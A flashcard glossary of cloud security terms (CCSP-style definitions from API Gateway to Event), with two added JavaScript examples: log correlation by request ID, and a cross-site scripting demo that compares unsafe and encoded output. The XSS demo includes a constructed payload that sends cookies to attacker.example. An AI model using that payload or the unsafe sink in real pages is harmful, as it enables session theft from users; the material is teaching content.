AIO Glossary Flashcards
A tool that sits between client systems and the back end services they call via API requests in order to serve as a reverse proxy for security and performance capabilities
API Gateway
A set of functions, routines, tools or protocols for building applications. An API allows for interaction between systems and applications that can be leveraged by developers as building blocks for their applications and data access through a common method, without custom coding for each integration
Application Programming Interface (API)
An estimated number of times a threat will successfully exploit a given vulnerability over the course of a single year
Annualized Rate of Occurrence (ARO)
A threat modeling approach composed of Architecture, Threats, Attack Surfaces and Mitigations
ATASM
The ability to properly capture, analyze and report on any and all events that happen within a system or application, such as data access and modification, user actions and processes, control effectiveness, and regulatory and contractual compliance
Auditability
The process of evaluating credentials presented by a user, application or service to prove its identity as compared to values already known and verified by the authentication system
Authentication
The process of granting or denying access to a system, network or application after successful authentication has been performed, based on approved criteria defined by policy and, where applicable, regulation
Authorization
Part of the change management process, which establishes an agreed upon standard configuration and the attributes that comprise it and forms the basis for managing change from that point forward
Baseline
A heavily fortified system that serves as a jumpbox or proxy between an untrusted network and trusted networks
Bastion Host
The capability of an organization to continue the operation of systems or applications at a predetermined level after an incident or a disruption of service
Business Continuity
A process designed to identify risks, threats and vulnerabilities that could disrupt or impact services, with the intent of determining mitigation strategies and response processes should they occur
Business Continuity Management
A developed and tested document, containing information from stakeholders and staff, for the continuation of operations and services in the event of a disruption or incident
Business Continuity Plan
A structured methodology to identify and evaluate the possible risks and threats that operations or services could be impacted by, as well as the possible or likely extent of impact and disruption
Business Impact Analysis
The formal documentation showing the chronological control and disposition of data or evidence, either physical or electronic. This documentation includes creation, all changes of possession and final disposition.
Chain of Custody
A group of IT service providers that interoperate based on an agreed upon set of standards and operations
Federation
An individual with a role in the change management process who ensures the overall change process is properly executed. This person also directly handles low-level tasks related to the change process
Change Manager
A software tool or service that sits between cloud resources and the clients or systems accessing them. It serves as a gateway that can perform a variety of security and policy enforcement functions. A CASB typically can consolidate and perform the functions of firewalls and web application firewalls as well as provide authentication and data loss prevention capabilities
Cloud Access Security Broker
An application that is never installed on a local server or desktop but is instead accessed via a network or the Internet. A cloud application merges the functionality of a local application with the accessibility of a web based application
Cloud Application
Within a PaaS implementation, CAMP serves as the framework and specification for managing platform services, encompassing a RESTful protocol for managing services, the model for describing and documenting the components that comprise the platform, and the language describing the overall platform, its components and services and the metadata about it
Cloud Application Management for Platforms (CAMP)
An auditor that is specifically responsible for conducting audits of cloud systems and cloud applications. The cloud auditor is responsible for assessing the effectiveness of cloud services and identifying control deficiencies between the cloud customer and the cloud provider, as well as the cloud broker if one is used
Cloud Auditor
The process of using a cloud based backup system, with files and data being sent over the network to a public or private cloud provider for backup, rather than running traditional backup systems within a data center
Cloud backup
A public or private cloud services organization that offers backup services to either the public or organizational clients, either on a free basis or using various costing models based on either the amount of data or number of systems
Cloud Backup Service Provider
Services that run within a public or private cloud offering backup solutions, either through client based software that does automatic or scheduled backups or through manual backups initiated by a user or system
Cloud Backup Solutions
An organization that sells and offers cloud services, and possibly cloud support services, to various organizations and works as a middleman between the cloud customer and cloud provider
Cloud Computing Reseller
A formally published guide by the Cloud Security Alliance that enables cloud customers to evaluate a prospective cloud provider in regard to its security posture. The CCM also allows a cloud provider to structure its security approach
Cloud Controls Matrix (CCM)
An organization or individual that utilizes and consumes resources and services from a cloud provider. This can be in the form of free public services and systems or private and fee based applications or solutions
Cloud Customer
The ability to move data between cloud providers
Cloud Data Portability
A database that is installed in a cloud environment and accessed via the network or the Internet by a user or application. Because the database is being installed in a cloud environment instead of a typical server environment, elasticity, scalability and high availability can be achieved and maximized
Cloud Database
A partner that serves as an intermediary between a cloud service customer and a cloud service provider
Cloud Service Broker
A group of cloud services with a common set of features or qualities
Cloud Service Category
One that holds a relation with either a cloud service provider or a cloud service customer to assist with cloud services and their delivery
Cloud Service Partner
A set of international guidelines and specifications for the evaluation of IT security resources to ensure that they meet an agreed upon set of security standards, specifically focused on government computing and security needs and requirements. The Common Criteria for Information Technology Security Evaluation is formalized as an international standard in ISO/IEC 15408
Common Criteria
A cloud infrastructure provisioned for exclusive use by a specific community of consumers from organizations that have shared concerns. It may be owned, managed and operated by one or more of the organizations in the community, a third party or some combination of these and it may exist on or off premises
Community Cloud
CaaS allows compute intensive workloads to be executed in the cloud. Code can be run in a serverless environment where the customer pays only for the computing time and cycles consumed, without the need to set up server instances or environments.
Compute as a Service (CaaS)
A paradigm that isolates the processing of data within a hardware-based trusted execution environment (a protected region of the CPU) that is isolated from other users and workloads on the same system, including the host operating system and hypervisor
Confidential Computing
Establishing a controlled means of consistency throughout a systems lifecycle, based on its requirements and technical specifications, to properly ensure configuration controls, performance standards and design requirements
Configuration Management
A software package that contains all of the code, configuration, and libraries needed for an application to operate, packaged inside a single unit
Container
The process of taking logs from many different systems and joining them on a common attribute, such as a session, request or user identifier, in order to fully track a session or transaction from end to end
Correlation
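As an added example (not part of the glossary), the correlation step above applied to constructed log lines from a reverse proxy, an application server and a database that share a request ID field (`rid`); the hostnames, IDs and line formats are assumed for illustration. Once the events for one transaction are grouped and time-ordered, a simple detection rule can flag a database read that no authenticated application-tier event accounts for.

```javascript
// Added example, not the glossary's code. Constructed log lines from three
// systems, deliberately out of time order, sharing a request ID ("rid").
const LOGS = [
  ["db",    "2024-05-01T10:00:02Z rid=r-41 query=SELECT user=svc_app rows=1"],
  ["proxy", "2024-05-01T10:00:00Z rid=r-41 src=203.0.113.7 path=/api/orders/17 status=200"],
  ["app",   "2024-05-01T10:00:01Z rid=r-41 user=alice action=read_order id=17"],
  ["proxy", "2024-05-01T10:00:05Z rid=r-42 src=198.51.100.9 path=/api/orders/17 status=200"],
  ["db",    "2024-05-01T10:00:06Z rid=r-42 query=SELECT user=svc_app rows=1"],
];

// Parse one line: the first token is an ISO-8601 timestamp, the rest are key=value pairs.
function parseLine(source, line) {
  const [ts, ...kv] = line.split(" ");
  const fields = Object.fromEntries(kv.map((t) => t.split("=")));
  return { ts, source, ...fields };
}

// Correlate: group every event by its rid, then order each group by timestamp
// so the transaction can be read proxy -> app -> db regardless of arrival order.
function correlate(logs) {
  const byRid = new Map();
  for (const [source, line] of logs) {
    const ev = parseLine(source, line);
    if (!byRid.has(ev.rid)) byRid.set(ev.rid, []);
    byRid.get(ev.rid).push(ev);
  }
  for (const evs of byRid.values()) {
    evs.sort((a, b) => a.ts.localeCompare(b.ts)); // ISO timestamps sort lexically
  }
  return byRid;
}

// Detection over the correlated view: a DB access with no app-tier event that
// attributes it to an authenticated user (the app layer was bypassed or failed to log).
function findUnattributedDbAccess(byRid) {
  const hits = [];
  for (const [rid, evs] of byRid) {
    const touchedDb = evs.some((e) => e.source === "db");
    const attributed = evs.some((e) => e.source === "app" && e.user);
    if (touchedDb && !attributed) hits.push(rid);
  }
  return hits;
}

// Usage: findUnattributedDbAccess(correlate(LOGS)) flags r-42 but not r-41.
```

The rule only works because the three sources emit the same identifier; in practice that usually means propagating a request ID header through the proxy and application tiers and logging it at each hop.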
A very common type of security vulnerability found in web applications, where an attacker injects client side scripts into web pages that are then viewed and executed in the browsers of other users. From an attacker's perspective, the goal of XSS is to bypass the security controls of the application and the browser, such as the same origin policy, and act with the victim's privileges
Cross Site Scripting
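As an added example (not part of the glossary), a reflected XSS sink beside its hardened form: a page built from a user-supplied `name` parameter, first with the value concatenated straight into the HTML and then with it HTML-encoded for the text context. The attacker payload, the function names and the `containsScriptTag` check are constructed for illustration.

```javascript
// Added example, not the glossary's code.

// Vulnerable: untrusted input is concatenated directly into HTML, so a value
// containing markup is parsed by the victim's browser as part of the page.
function renderGreetingUnsafe(name) {
  return `<h1>Hello, ${name}</h1>`;
}

// Hardened: encode the characters that let input break out of an HTML text
// context. This encoder is for element content; attribute, JavaScript and URL
// contexts each need their own encoding rules.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

function renderGreetingSafe(name) {
  return `<h1>Hello, ${escapeHtml(name)}</h1>`;
}

// Constructed attacker payload: a script that exfiltrates the victim's cookies
// to a hypothetical attacker-controlled host.
const PAYLOAD =
  '<script>document.location="https://attacker.example/?c="+document.cookie</script>';

// Check whether a rendered page contains an executable script element.
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// Demo: returns [unsafeHasScript, safeHasScript]; expected [true, false].
function demo() {
  return [
    containsScriptTag(renderGreetingUnsafe(PAYLOAD)),
    containsScriptTag(renderGreetingSafe(PAYLOAD)),
  ];
}
```

Output encoding at the sink is the primary defense; a Content Security Policy and `HttpOnly` cookies limit what a successful injection can do but do not remove the vulnerability.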
Data that resides on a system in persistent storage, such as disks, tapes, databases or any other type of storage device
Data at Rest (DAR)
The feature of cloud storage where data is spread across data centers or wide geographic areas for redundancy and speed. The degree of dispersion is typically based on the needs of the application and the level of service procured by the cloud customer
Data Dispersion
Serverless, managed data processing service offered by a cloud provider for the execution of data pipelines
Data Flow
Data that flows over a networked connection, either through public unsecured networks or internal protected corporate networks
Data in Transit
Data within a system or application that is currently being processed or is in use, either through the computing resources or residing in memory
Data in Use
An overall strategy and process for ensuring that users cannot send sensitive or protected information outside of the networks or systems that are secured and protected. This can be related to an intentional attempt by a user to transfer such information, but it also applies to preventing the accidental sending or leakage of data
Data Loss Prevention
The ability to easily move data from one system to another without having to re-enter it
Data Portability
A suite of tools used to monitor database operations and functions in real time in order to detect security concerns or anomalies
Database Activity Monitoring (DAM)
A subscription service where the database is installed, configured, secured and maintained by the cloud provider, and the cloud customer is responsible only for loading their schema and data
Database as a Service (DBaaS)
A cloud based equivalent of a traditional virtual desktop infrastructure (VDI) deployment that is hosted and managed by a cloud provider rather than on hardware owned by the customer
Desktop as a Service (DaaS)
Combines software development with IT operations, with a goal of shortening the software development time and providing optimal uptime and quality of service
DevOps
Short for development, security and operations. The process of integrating security at all levels and stages of development and operations to fully ensure best practices and a focus on security
DevSecOps
Information that specifically applies to a unique individual, such as name, address, phone number, email address, or unique identifying numbers or codes
Direct Identifier
A utility from VMware that balances computing demands and available resources within the virtualized environment
Distributed Resource Scheduler (DRS)
The testing of an application while it is in an operational state with currently running systems, applications and networks
Dynamic Application Security Testing (DAST)
The process of moving and reallocating virtual machines and resources within a cluster environment to maintain optimal performance with balanced and distributed resource utilization
Dynamic Optimization
A computing paradigm that is based on putting the processing of data and computing resources as close to the source of that data as possible
Edge Computing
The process in a criminal or civil legal case by which electronic data is identified, located and secured to be used as evidence
eDiscovery
The process of encoding and securing data so that only authorized parties in possession of the correct information, credentials or keys can access it
Encryption
An application that runs on a large and distributed scale and is deemed mission critical to a company or organization
Enterprise Application
A cloud based backup and recovery service that is related to and similar to those offered for personal use, but scaled and focused on large scale and organizational level services
Enterprise Cloud Backup
Temporary, unstructured storage that is only used for a node or service while it is active and in use and is destroyed upon being shut down or deleted
Ephemeral Storage
An action or situation that is recognized by software that then causes some action or response by the software to be taken
Event